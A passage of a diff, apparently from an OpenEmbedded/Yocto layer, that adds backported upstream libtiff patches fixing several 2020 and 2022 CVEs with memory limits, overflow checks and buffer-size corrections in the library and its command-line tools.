+-		fprintf(stderr, "%s\n", stuff[i]);
++		fprintf(out, "%s\n", stuff[i]);
+ 	exit(code);
+ }
+ 
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..b6e1842a54
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
+From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 3 Oct 2020 18:16:27 +0200
+Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index ef643653..fbc383aa 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+             return( cvt_whole_image( in, out ) );
+ }
+ 
+-const static char* stuff[] = {
++static const char* stuff[] = {
+     "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+     "where comp is one of the following compression algorithms:",
+     " jpeg\t\tJPEG encoding",
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..129721ff3e
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
+From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:02:51 +0100
+Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
+
+fixes #207
+fixes #209
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+---
+CVE: CVE-2020-35521
+CVE: CVE-2020-35522
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index fbc383aa..764395f6 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
+ int process_by_block = 0; /* default is whole image at once */
+ int no_alpha = 0;
+ int bigtiff_output = 0;
++#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
++/* malloc size limit (in bytes)
++ * disabled when set to 0 */
++static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
+ 
+ 
+ static int tiffcvt(TIFF* in, TIFF* out);
+@@ -75,8 +79,11 @@ main(int argc, char* argv[])
+ 	extern char *optarg;
+ #endif
+ 
+-	while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
++	while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
+ 		switch (c) {
++			case 'M':
++				maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
++				break;
+ 			case 'b':
+ 				process_by_block = 1;
+ 				break;
+@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
+ 		  (unsigned long)width, (unsigned long)height);
+         return 0;
+     }
++    if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
++	TIFFError(TIFFFileName(in),
++		  "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
++		  (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
++        return 0;
++    }
+ 
+     rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
+     TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
+@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
+ 	TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
+ 	CopyField(TIFFTAG_DOCUMENTNAME, stringv);
+ 
++	if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
++	{
++		TIFFError(TIFFFileName(in),
++			  "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
++			  (uint64)TIFFStripSize(in), (uint64)maxMalloc);
++		return 0;
++	}
+         if( process_by_block && TIFFIsTiled( in ) )
+             return( cvt_by_tile( in, out ) );
+         else if( process_by_block )
+@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ }
+ 
+ static const char* stuff[] = {
+-    "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
++    "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
+     "where comp is one of the following compression algorithms:",
+     " jpeg\t\tJPEG encoding",
+     " zip\t\tZip/Deflate encoding",
+@@ -551,6 +571,7 @@ static const char* stuff[] = {
+     " -b (progress by block rather than as a whole image)",
+     " -n don't emit alpha component.",
+     " -8 write BigTIFF file instead of ClassicTIFF",
++    " -M set the memory allocation limit in MiB. 0 to disable limit",
+     NULL
+ };
+ 
+-- 
+GitLab
+
+
+From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:08:42 +0100
+Subject: [PATCH 2/2] tiff2rgba.1: -M option
+
+---
+ man/tiff2rgba.1 | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
+index d9c9baae..fe9ebb2c 100644
+--- a/man/tiff2rgba.1
++++ b/man/tiff2rgba.1
+@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
+ Currently this does not work if the
+ .B \-b
+ flag is also in effect.
++.TP
++.BI \-M " size"
++Set maximum memory allocation size (in MiB). The default is 256MiB.
++Set to 0 to disable the limit.
+ .SH "SEE ALSO"
+ .BR tiff2bw (1),
+ .BR TIFFReadRGBAImage (3t),
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
new file mode 100644
index 0000000000..1f30b32799
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
+From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:54:30 +0100
+Subject: [PATCH] gtTileContig(): check Tile width for overflow
+
+fixes #211
+
+Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
+CVE: CVE-2020-35523
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ libtiff/tif_getimage.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 4da785d3..96ab1460 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -29,6 +29,7 @@
+  */
+ #include "tiffiop.h"
+ #include <stdio.h>
++#include <limits.h>
+ 
+ static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
+ static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
+@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
+ 
+     flip = setorientation(img);
+     if (flip & FLIP_VERTICALLY) {
+-	    y = h - 1;
+-	    toskew = -(int32)(tw + w);
++        if ((tw + w) > INT_MAX) {
++            TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++            return (0);
++        }
++        y = h - 1;
++        toskew = -(int32)(tw + w);
+     }
+     else {
+-	    y = 0;
+-	    toskew = -(int32)(tw - w);
++        if (tw > (INT_MAX + w)) {
++            TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++            return (0);
++        }
++        y = 0;
++        toskew = -(int32)(tw - w);
+     }
+      
+     /*
+-- 
+GitLab
+
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
new file mode 100644
index 0000000000..5232eacb50
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
+From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:01:59 +0100
+Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
+ YCbCr
+
+fixes #220
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiff2pdf.c | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index 719811ea..dc69d2f9 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ 		(void) 0;
+ 	}
+-	k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+-	if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+-		k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++	if(t2p->pdf_compression == T2P_COMPRESS_JPEG
++	   && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
++		k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
++	} else {
++		k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
++		if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
++			k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++		}
+ 	}
+ 	if (k == 0) {
+ 		/* Assume we had overflow inside TIFFScanlineSize */
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
new file mode 100644
index 0000000000..406d467766
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
+From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 02:05:05 +0100
+Subject: [PATCH] Fix for building without JPEG support
+
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiff2pdf.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index dc69d2f9..d0b0ede7 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ 		(void) 0;
+ 	}
++#ifdef JPEG_SUPPORT
+ 	if(t2p->pdf_compression == T2P_COMPRESS_JPEG
+ 	   && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
+ 		k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
+-	} else {
++	} else
++#endif
++	{
+ 		k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+ 		if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+ 			k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
new file mode 100644
index 0000000000..e2d136f587
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
+From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 24 Feb 2022 22:26:02 +0100
+Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
+ in memory-mapped mode and when bit reversal is needed (fixes #385)
+
+CVE: CVE-2022-0865
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_jbig.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
+index 74086338..8bfa4cef 100644
+--- a/libtiff/tif_jbig.c
++++ b/libtiff/tif_jbig.c
+@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
+ 	 */
+ 	tif->tif_flags |= TIFF_NOBITREV;
+ 	tif->tif_flags &= ~TIFF_MAPPED;
++	/* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
++	 * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
++	 * value to be consistent with the state of a non-memory mapped file.
++	 */
++	if (tif->tif_flags&TIFF_BUFFERMMAP) {
++		tif->tif_rawdata = NULL;
++		tif->tif_rawdatasize = 0;
++		tif->tif_flags &= ~TIFF_BUFFERMMAP;
++		tif->tif_flags |= TIFF_MYBUFFER;
++	}
+ 
+ 	/* Setup the function pointers for encode, decode, and cleanup. */
+ 	tif->tif_setupdecode = JBIGSetupDecode;
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
new file mode 100644
index 0000000000..e2f1bd3056
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
+From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 8 Mar 2022 17:02:44 +0000
+Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
+ extractImageSection
+
+CVE: CVE-2022-0891
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
+ 1 file changed, 36 insertions(+), 56 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..e62bcc71 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -105,8 +105,8 @@
+  *                of messages to monitor progess without enabling dump logs.
+  */
+ 
+-static   char tiffcrop_version_id[] = "2.4";
+-static   char tiffcrop_rev_date[] = "12-13-2010";
++static   char tiffcrop_version_id[] = "2.4.1";
++static   char tiffcrop_rev_date[] = "03-03-2010";
+ 
+ #include "tif_config.h"
+ #include "tiffiop.h"
+@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+   uint32    img_length;
+ #endif
+-  uint32    j, shift1, shift2, trailing_bits;
++  uint32    j, shift1, trailing_bits;
+   uint32    row, first_row, last_row, first_col, last_col;
+   uint32    src_offset, dst_offset, row_offset, col_offset;
+-  uint32    offset1, offset2, full_bytes;
++  uint32    offset1, full_bytes;
+   uint32    sect_width;
+ #ifdef DEVELMODE
+   uint32    sect_length;
+@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+   int      k;
+   unsigned char bitset;
+-  static char *bitarray = NULL;
+ #endif
+ 
+   img_width = image->width;
+@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+   dst_offset = 0;
+ 
+ #ifdef DEVELMODE
+-  if (bitarray == NULL)
+-    {
+-    if ((bitarray = (char *)malloc(img_width)) == NULL)
+-      {
+-      TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
+-      return (-1);
+-      }
+-    }
++  char bitarray[39];
+ #endif
+ 
+-  /* rows, columns, width, length are expressed in pixels */
++  /* rows, columns, width, length are expressed in pixels
++   * first_row, last_row, .. are index into image array starting at 0 to width-1,
++   * last_col shall be also extracted.  */
+   first_row = section->y1;
+   last_row  = section->y2;
+   first_col = section->x1;
+@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+   sect_length = last_row - first_row + 1;
+ #endif
+-  img_rowsize = ((img_width * bps + 7) / 8) * spp;
+-  full_bytes = (sect_width * spp * bps) / 8;   /* number of COMPLETE bytes per row in section */
+-  trailing_bits = (sect_width * bps) % 8;
++    /* The read function loadImage() used copy separate plane data into a buffer as interleaved
++     * samples rather than separate planes so the same logic works to extract regions
++     * regardless of the way the data are organized in the input file.
++     * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1 
++     */
++    img_rowsize = (((img_width * spp * bps) + 7) / 8);    /* row size in full bytes of source image */
++    full_bytes = (sect_width * spp * bps) / 8;            /* number of COMPLETE bytes per row in section */
++    trailing_bits = (sect_width * spp * bps) % 8;         /* trailing bits within the last byte of destination buffer */
+ 
+ #ifdef DEVELMODE
+     TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
+@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ 
+   if ((bps % 8) == 0)
+     {
+-    col_offset = first_col * spp * bps / 8;
++    col_offset = (first_col * spp * bps) / 8;
+     for (row = first_row; row <= last_row; row++)
+       {
+-      /* row_offset = row * img_width * spp * bps / 8; */
+       row_offset = row * img_rowsize;
+       src_offset = row_offset + col_offset;
+ 
+@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+     }
+   else
+     { /* bps != 8 */
+-    shift1  = spp * ((first_col * bps) % 8);
+-    shift2  = spp * ((last_col * bps) % 8);
++    shift1 = ((first_col * spp * bps) % 8);           /* shift1 = bits to skip in the first byte of source buffer*/
+     for (row = first_row; row <= last_row; row++)
+       {
+       /* pull out the first byte */
+       row_offset = row * img_rowsize;
+-      offset1 = row_offset + (first_col * bps / 8);
+-      offset2 = row_offset + (last_col * bps / 8);
++      offset1 = row_offset + ((first_col * spp * bps) / 8);   /* offset1 = offset into source of byte with first bits to be extracted */
+ 
+ #ifdef DEVELMODE
+       for (j = 0, k = 7; j < 8; j++, k--)
+@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+       sprintf(&bitarray[9], " ");
+       for (j = 10, k = 7; j < 18; j++, k--)
+         {
+-        bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
++        bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
+         sprintf(&bitarray[j], (bitset) ? "1" : "0");
+         }
+       bitarray[18] = '\0';
+-      TIFFError ("", "Row: %3d Offset1: %d,  Shift1: %d,    Offset2: %d,  Shift2:  %d\n", 
+-                 row, offset1, shift1, offset2, shift2); 
++      TIFFError ("", "Row: %3d Offset1: %"PRIu32",  Shift1: %"PRIu32",    Offset2: %"PRIu32",  Trailing_bits:  %"PRIu32"\n", 
++                 row, offset1, shift1, offset1+full_bytes, trailing_bits); 
+ #endif
+ 
+       bytebuff1 = bytebuff2 = 0;
+@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ 
+         if (trailing_bits != 0)
+           {
+-	  bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
++      /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
++	  bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
+           sect_buff[dst_offset] = bytebuff2;
+ #ifdef DEVELMODE
+ 	  TIFFError ("", "        Trailing bits src offset:  %8d, Dst offset: %8d\n", 
+-                              offset2, dst_offset); 
++          offset1 + full_bytes, dst_offset);
+           for (j = 30, k = 7; j < 38; j++, k--)
+             {
+             bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
+@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+         for (j = 0; j <= full_bytes; j++) 
+           {
+-	  bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
+-	  bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
++          /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
++          /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
++          bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
++          bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
+           sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
+           }
+ #ifdef DEVELMODE
+@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+         dst_offset += full_bytes;
+ 
++        /* Copy the trailing_bits for the last byte in the destination buffer. 
++           Could come from one ore two bytes of the source buffer. */
+         if (trailing_bits != 0)
+           {
+ #ifdef DEVELMODE
+-	    TIFFError ("", "        Trailing bits   src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset); 
+-#endif
+-	  if (shift2 > shift1)
+-            {
+-	    bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
+-            bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
+-            sect_buff[dst_offset] = bytebuff2;
+-#ifdef DEVELMODE
+-	    TIFFError ("", "        Shift2 > Shift1\n"); 
++          TIFFError("", "        Trailing bits %4"PRIu32"   src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
+ #endif
++          /* More than necessary bits are already copied into last destination buffer, 
++           * only masking of last byte in destination buffer is necessary.*/ 
++          sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
+             }
+-          else
+-            {
+-	    if (shift2 < shift1)
+-              {
+-              bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
+-	      sect_buff[dst_offset] &= bytebuff2;
+-#ifdef DEVELMODE
+-	      TIFFError ("", "        Shift2 < Shift1\n"); 
+-#endif
+-              }
+-#ifdef DEVELMODE
+-            else
+-	      TIFFError ("", "        Shift2 == Shift1\n"); 
+-#endif
+-            }
+-	  }
+ #ifdef DEVELMODE
+ 	  sprintf(&bitarray[28], " ");
+ 	  sprintf(&bitarray[29], " ");
+@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
+     width  = sections[i].x2 - sections[i].x1 + 1;
+     length = sections[i].y2 - sections[i].y1 + 1;
+     sectsize = (uint32)
+-	    ceil((width * image->bps + 7) / (double)8) * image->spp * length;
++	    ceil((width * image->bps * image->spp + 7) / (double)8) * length;
+     /* allocate a buffer if we don't have one already */
+     if (createImageSection(sectsize, sect_buff_ptr))
+       {
+-- 
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
new file mode 100644
index 0000000000..da3ead5481
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
+From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
+From: Augustus <wangdw.augustus@qq.com>
+Date: Mon, 7 Mar 2022 18:21:49 +0800
+Subject: [PATCH] add checks for return value of limitMalloc (#392)
+
+CVE: CVE-2022-0907
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcrop.c | 33 +++++++++++++++++++++------------
+ 1 file changed, 21 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..9b8acc7e 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+   if (!sect_buff)
+     {
+     sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
+-    *sect_buff_ptr = sect_buff;
++    if (!sect_buff)
++    {
++        TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++        return (-1);
++    }
+     _TIFFmemset(sect_buff, 0, sectsize);
+     }
+   else
+@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+       else
+         sect_buff = new_buff;
+ 
++      if (!sect_buff)
++      {
++          TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++          return (-1);
++      }
+       _TIFFmemset(sect_buff, 0, sectsize);
+       }
+     }
+ 
+-  if (!sect_buff)
+-    {
+-    TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+-    return (-1);
+-    }
+   prev_sectsize = sectsize;
+   *sect_buff_ptr = sect_buff;
+ 
+@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   if (!crop_buff)
+     {
+     crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
+-    *crop_buff_ptr = crop_buff;
++    if (!crop_buff)
++    {
++        TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++        return (-1);
++    }
+     _TIFFmemset(crop_buff, 0, cropsize);
+     prev_cropsize = cropsize;
+     }
+@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+         }
+       else
+         crop_buff = new_buff;
++      if (!crop_buff)
++      {
++          TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++          return (-1);
++      }
+       _TIFFmemset(crop_buff, 0, cropsize);
+       }
+     }
+ 
+-  if (!crop_buff)
+-    {
+-    TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+-    return (-1);
+-    }
+   *crop_buff_ptr = crop_buff;
+ 
+   if (crop->crop_mode & CROP_INVERT)
+@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
+  * fill-column: 78
+  * End:
+  */
++
+-- 
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
+From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 17 Feb 2022 15:28:43 +0100
+Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #383)
+
+CVE: CVE-2022-0908
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dirread.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 50ebf8ac..2ec44a4f 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
+ 								_TIFFfree(data);
+ 							return(0);
+ 						}
+-						_TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++						if (dp->tdir_count > 0 )
++						{
++							_TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++						}
+ 						o[(uint32)dp->tdir_count]=0;
+ 						if (data!=0)
+ 							_TIFFfree(data);
+-- 
+GitLab
+
